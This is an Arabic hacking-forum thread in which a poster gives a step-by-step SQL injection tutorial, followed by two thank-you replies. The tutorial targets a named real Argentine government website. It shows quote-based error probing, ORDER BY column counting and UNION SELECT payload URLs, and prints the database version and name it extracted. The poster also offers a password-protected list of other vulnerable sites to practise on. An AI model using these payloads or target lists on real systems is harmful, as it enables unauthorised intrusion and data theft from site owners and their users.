الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة

الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة


النتائج 1 إلى 3 من 3

الموضوع: الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة

  1. #1
    هكر مجتهد الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    Hasri الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة

    أولا السلام عليكم و رحمة الله تعالى و بركاته
    و شكرا على مروركم

    حاولت أن أشرح في هاذا الموضوع نوعا من أنواع اختراق المواقع و هو حقن الsql

    نبدأ على بركة الله

    1- كيفية اكتشاف ثغرات الsql

    لاكتشاف ثغرات الsql نضيف ' إلى المتغير فإذا كان الموقع مصاب سيظهر لنا خطأ
    مثلا ستظهر الجملة
    You have an error in your SQL syntaxأو
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in.......
    داخل الموقع أو سينقص أو يتغير محتوى الموقع
    ملاحظة : يمكن أن لا يضهر خطأ عند إضافة ' لكن هذا لا يعنني أن الموقع غير مصاب
    جربوا إضافة كتابة معينة إلى المتغير مثلا سأضيف Hidden pain ربما سيضهر خطأ
    مثال :
    هذا موقع مصاب
    http://www.saladillo.gov.ar/notas.php?id=1
    عند إضافة ' إلى المتغير ليصبح كالتالي
    http://www.saladillo.gov.ar/notas.php?id=1'
    سيضهر خطأ و كذلك عند إضافة كلمة ك :
    http://www.saladillo.gov.ar/notas.php?id=1hidden pain

    أرجو أن تكون الفكرة وصلت..

    2- نبدأ الاستغلال :p:p


    حسنا .. الآن بعد ما اكتشفنا الثغرة
    يجب الإن اكتشاف عدد الأعمدة
    و لذلك نقوم بإضافة
    كود PHP:
    +order+by
    ليصبح الموقع كالتالي
    كود PHP:
    http://www.saladillo.gov.ar/notas.php?id=1+order+by+ 
    و نضيف بعدها عدد أعمدة ( نحزره )
    مثلا +order+by+1إذا ضهرت الصفحة سليمة يعني العمود 1 موجود
    نواصل
    +order+by+6
    إذا ضهرت الصفحة يعني العمود 6 موجود
    نواصل إلى غاية ظهور خطأ
    مثلا في هذا الموقع عند الوصول للعمود رقم 11
    +order+by+11ضهر لي خطأ
    Warning: mysql_fetch_array(....
    يعني العمود 11 غير موجود و عدد الأعمدة هو 10
    ملاحظة : يمكن أيضا أن لا يظهر خطأ
    يمكن أن ينقص محتوى الصفحة أو يختفي .. هذا يعتبر خطأ :rolleyes:... المهم اذهب لإحضار شيئ تأكله أو تشربه و شغل مخك معي :p

    أضن إلى غاية الآن ليس هناك شيئ صعب ..

    عرفنا عدد الأعمدة ( 10 ) و بقى أن نكتشف الأعمدة المصابة ..
    نكتب بعد المتغير
    كود PHP:
    -1+union+select+1,2,3,4,5,6,7,8,9,10-- 
    ليصبح الموقع كالتالي
    كود PHP:
    http://www.saladillo.gov.ar/notas.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10-- 
    لاحظوا الأرقام كيف أضفتها من رقم أول عمود إلى آخر عمود
    نضيف الأرقام حسب عدد الأعمدة
    مثلا إن كان العدد 6
    سنضيف
    كود PHP:
    -1+union+select+1,2,3,4,5,6-- 
    و أيضا لاحضوا اشارات ال - في البداية قبل المتغير - واحدة
    و بعد المتغير إثنتان

    الآن ستضهر الأعمدة المصابة في الصفحة
    هنا ضهرت لي ... 4 . 5 . 7 .8
    هذه هي الأعمدة التي سأستعملها في الإستعلام
    كود PHP:
    database() 
    نستعمل هذا الأمر لجلب اسم القاعدة--
    كود PHP:
    version() 
    و هذا لإضهار اصدار القاعدة
    و نضعهما في مكان أحد الأعمدة المصابة مثلا مكان العمود 5 و 4
    يصبح الموقع كالتالي :
    كود PHP:
    http://www.saladillo.gov.ar/notas.php?id=-1+union+select+1,2,3,version%28%29,database%28%29,6,7,8,9,10-- 
    ظهر لي
    الإصدار : 4.1.22-standard
    اسم القاعدة :
    me000007_saladillo

    مشكلة : أمي تنادي علي لا أدري لماذا :p:p
    -------------------------------------------------------

    قبل أ أذهب أردت إخباركم أن هناك اختلاف في الحقن بين الإصدار الرابع و الإصدار الخامس
    فالرابع يعتمد على تخمين أسامي الجداول و التي تكون عادة admin - user - users- admins - usarios .... ,و شيئ من هذا القبيل
    أما الإصدار الخامس فبه شيئ اسمه INFORMATION_SCHEMA
    يساعد على استخراج أسامي الجداول

    أرجوا أن أكون قد أفدت و لو بالشيئ القليل :o:o

    الأنترنت ستنقطع اليوم و لا أملك نقودا كافية لإعادة الإشتراك----
    فأرجو أن تعذروني على عدم اكمال الموضوع-----
    و إن شاء الله سأكمل في أقرب وقت ممكن

    بخصوص الهدية فهي مجموعة مواقع مصابة للتدرب عليها..
    pass : www.aljyyosh.com


  2. #2

    افتراضي رد: الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة

    مشكور اخي على تعبك بالموضوع

    تحياتي لك

  3. #3

    افتراضي رد: الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة

    سلمت يدااااااك على هذا الموضوع الرااااائع

    دمت في تألق وابداع


    إن المحبة الصادقة كعلاقة اليد بالعين إذا تألمت اليد دمعت العين وإذا دمعت العين مسحتها اليد

المواضيع المتشابهه

  1. برنامج برووايجينت proagent اقوى برنامج لسرقة الايميلات صور +الشرح
    بواسطة DR.X في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 48
    آخر مشاركة: 01-31-2013, 03:27 PM
  2. يا ليت تنفذون طلبي البسيط
    بواسطة { عبودي } في المنتدى منتدى الإختراق العام
    مشاركات: 0
    آخر مشاركة: 05-05-2010, 09:57 PM
  3. بنت صغيرة تنكت لا تفوووتكم
    بواسطة أستغفر الله في المنتدى المنتدى العام
    مشاركات: 0
    آخر مشاركة: 01-05-2010, 08:32 PM
  4. مساعدة صغيرة
    بواسطة guetta_vendetta في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 0
    آخر مشاركة: 11-10-2009, 03:16 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •